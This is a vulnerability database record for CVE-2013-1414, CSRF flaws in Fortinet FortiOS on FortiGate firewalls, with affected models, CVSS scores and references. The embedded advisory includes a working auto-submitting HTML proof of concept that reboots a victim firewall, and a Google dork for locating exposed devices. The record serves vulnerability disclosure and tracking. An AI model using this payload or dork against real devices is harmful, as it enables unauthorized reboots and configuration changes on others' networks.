Details of VAR-201307-0030

ID

VAR-201307-0030

CVE

CVE-2013-1414

TITLE

Fortinet FortiGate Runs on the device FortiOS Vulnerable to cross-site request forgery

Trust: 0.8

sources: JVNDB: JVNDB-2013-003232

DESCRIPTION

Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414 Vulnerability Type: CSRF (Cross-Site Request Forgery) Product: All Fortigate Firewalls Vendor: Fortinet http://www.fortinet.com Vulnerable Version: < 4.3.13 & < 5.0.2 Description ========== Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. Requirements =========== An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. Report-Timeline: ================ Vendor Notification: 11 July 2012 Vendor released version 5.0.2 / 18 March 2013 Vendor released version 4.3.13 / 29 April 2013 Status: Fixed Google Dork: ========== -english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser" Credit: ===== Sven Wurth dos@net-war.de PoC ==== This Example will reboot a Fortinet Firewall. This is just one of many possibilities to attack this vulnerability. ##### CSRF - Proof Of Concept #### <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post"> <input type="hidden" name="reason" value=""> <input type="hidden" name="action" value="1"> <input type="submit" name="add" value="rebootme"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> ##### End Poc #####

Trust: 2.07

sources: NVD: CVE-2013-1414 // JVNDB: JVNDB-2013-003232 // BID: 60861 // VULHUB: VHN-61416 // PACKETSTORM: 122216

AFFECTED PRODUCTS

vendor:	fortinet	model:	fortios	scope:	eq	version:	5.0.1	Trust: 1.9
vendor:	fortinet	model:	fortios	scope:	eq	version:	5.0	Trust: 1.9
vendor:	fortinet	model:	fortios	scope:	eq	version:	4.3.10	Trust: 1.6
vendor:	fortinet	model:	fortios	scope:	eq	version:	5.0.2	Trust: 1.1
vendor:	fortinet	model:	fortigate-3810a	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-600c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-110c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-310b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-20c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-voice-80c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigaterugged-100c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-3040b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-620b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-300c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-1000c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-5001a-sw	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-100d	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-200b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-800c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-60c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-5060	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-5020	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-5001b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-50b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-3950b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-3140b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-1240b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortios	scope:	lte	version:	4.3.12	Trust: 1.0
vendor:	fortinet	model:	fortigate-5101c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-3240c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-40c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-5140b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-80c	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-311b	scope:	eq	version:	-	Trust: 1.0
vendor:	fortinet	model:	fortigate-110c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-1240b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-300c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-3140b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-600c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-100d	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-3950b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-200b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-1000c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-5020	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-5001a-sw	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-620b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-50b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-3240c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-20c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-3040b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-800c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-80c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortios	scope:	lt	version:	5.x	Trust: 0.8
vendor:	fortinet	model:	fortigate-5060	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-voice-80c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-310b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-3810a	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-5101c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-5001b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-40c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-311b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-60c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate rugged-100c	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortigate-5140b	scope:	-	version:	-	Trust: 0.8
vendor:	fortinet	model:	fortios	scope:	eq	version:	4.3.12	Trust: 0.6
vendor:	fortinet	model:	fortios b0630	scope:	eq	version:	4.3.8	Trust: 0.3
vendor:	fortinet	model:	fortios b0537	scope:	eq	version:	4.3.8	Trust: 0.3
vendor:	fortinet	model:	fortios	scope:	eq	version:	4.3.8	Trust: 0.3
vendor:	fortinet	model:	fortios b064	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fortinet	model:	fortigate-60c	scope:	eq	version:	4.0	Trust: 0.3
vendor:	fortinet	model:	fortigate-100d	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fortinet	model:	fortigate-1000	scope:	eq	version:	3.00	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	4.3.6	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	4.3.5	Trust: 0.3
vendor:	fortinet	model:	fortigate 800f	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	800	Trust: 0.3
vendor:	fortinet	model:	fortigate 620b	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 60m	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	60	Trust: 0.3
vendor:	fortinet	model:	fortigate 50am	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 50a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 500a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	5000	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	500	Trust: 0.3
vendor:	fortinet	model:	fortigate 400a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	4000	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	400	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	3950	Trust: 0.3
vendor:	fortinet	model:	fortigate 3810a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 3600a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	3600	Trust: 0.3
vendor:	fortinet	model:	fortigate 311b	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 310b	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 3016b	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 300a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	3000	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	300	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	3.00	Trust: 0.3
vendor:	fortinet	model:	fortigate 224b	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 200b	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 200a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	200	Trust: 0.3
vendor:	fortinet	model:	fortigate 1240b	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 100a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 1000afa2	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate 1000a	scope:	-	version:	-	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	1000	Trust: 0.3
vendor:	fortinet	model:	fortigate	scope:	eq	version:	100	Trust: 0.3
vendor:	fortinet	model:	fortios	scope:	ne	version:	5.0.3	Trust: 0.3
vendor:	fortinet	model:	fortios	scope:	ne	version:	4.3.13	Trust: 0.3

sources: BID: 60861 // JVNDB: JVNDB-2013-003232 // CNNVD: CNNVD-201307-116 // NVD: CVE-2013-1414

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2013-1414
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2013-1414
value:	MEDIUM
Trust: 0.8
CNNVD:	CNNVD-201307-116
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-61416
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2013-1414
severity:	MEDIUM
baseScore:	5.1
vectorString:	AV:N/AC:H/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	HIGH
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	4.9
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
VULHUB:	VHN-61416
severity:	MEDIUM
baseScore:	5.1
vectorString:	AV:N/AC:H/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	HIGH
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	4.9
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: VULHUB: VHN-61416 // JVNDB: JVNDB-2013-003232 // CNNVD: CNNVD-201307-116 // NVD: CVE-2013-1414

PROBLEMTYPE DATA

problemtype:

CWE-352

Trust: 1.9

sources: VULHUB: VHN-61416 // JVNDB: JVNDB-2013-003232 // NVD: CVE-2013-1414

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201307-116

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201307-116

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-003232

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-61416

PATCH

title:

FortiGateアプライアンス

url:

http://www.fortinet.co.jp/products/fortigate/

Trust: 0.8

sources: JVNDB: JVNDB-2013-003232

EXTERNAL IDS

db:	NVD	id:	CVE-2013-1414	Trust: 2.9
db:	EXPLOIT-DB	id:	26528	Trust: 1.7
db:	JVNDB	id:	JVNDB-2013-003232	Trust: 0.8
db:	CNNVD	id:	CNNVD-201307-116	Trust: 0.7
db:	BID	id:	60861	Trust: 0.4
db:	PACKETSTORM	id:	122216	Trust: 0.2
db:	SEEBUG	id:	SSVID-80159	Trust: 0.1
db:	VULHUB	id:	VHN-61416	Trust: 0.1

sources: VULHUB: VHN-61416 // BID: 60861 // JVNDB: JVNDB-2013-003232 // PACKETSTORM: 122216 // CNNVD: CNNVD-201307-116 // NVD: CVE-2013-1414

REFERENCES

url:	http://www.exploit-db.com/exploits/26528/	Trust: 1.7
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1414	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1414	Trust: 0.8
url:	https://www.fortinet.com/	Trust: 0.3
url:	https://nvd.nist.gov/vuln/detail/cve-2013-1414	Trust: 0.1
url:	http://www.fortinet.com	Trust: 0.1
url:	https://###_victim_ip_###/system/maintenance/shutdown"	Trust: 0.1

sources: VULHUB: VHN-61416 // BID: 60861 // JVNDB: JVNDB-2013-003232 // PACKETSTORM: 122216 // CNNVD: CNNVD-201307-116 // NVD: CVE-2013-1414

CREDITS

Sven Wurth

Trust: 0.4

sources: BID: 60861 // PACKETSTORM: 122216

SOURCES

db:	VULHUB	id:	VHN-61416
db:	BID	id:	60861
db:	JVNDB	id:	JVNDB-2013-003232
db:	PACKETSTORM	id:	122216
db:	CNNVD	id:	CNNVD-201307-116
db:	NVD	id:	CVE-2013-1414

LAST UPDATE DATE

2024-08-14T14:34:19.704000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-61416	date:	2013-07-08T00:00:00
db:	BID	id:	60861	date:	2013-06-28T00:00:00
db:	JVNDB	id:	JVNDB-2013-003232	date:	2013-07-09T00:00:00
db:	CNNVD	id:	CNNVD-201307-116	date:	2013-07-09T00:00:00
db:	NVD	id:	CVE-2013-1414	date:	2013-07-08T17:55:02.783

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-61416	date:	2013-07-08T00:00:00
db:	BID	id:	60861	date:	2013-06-28T00:00:00
db:	JVNDB	id:	JVNDB-2013-003232	date:	2013-07-09T00:00:00
db:	PACKETSTORM	id:	122216	date:	2013-06-28T22:13:39
db:	CNNVD	id:	CNNVD-201307-116	date:	2013-07-09T00:00:00
db:	NVD	id:	CVE-2013-1414	date:	2013-07-08T17:55:02.783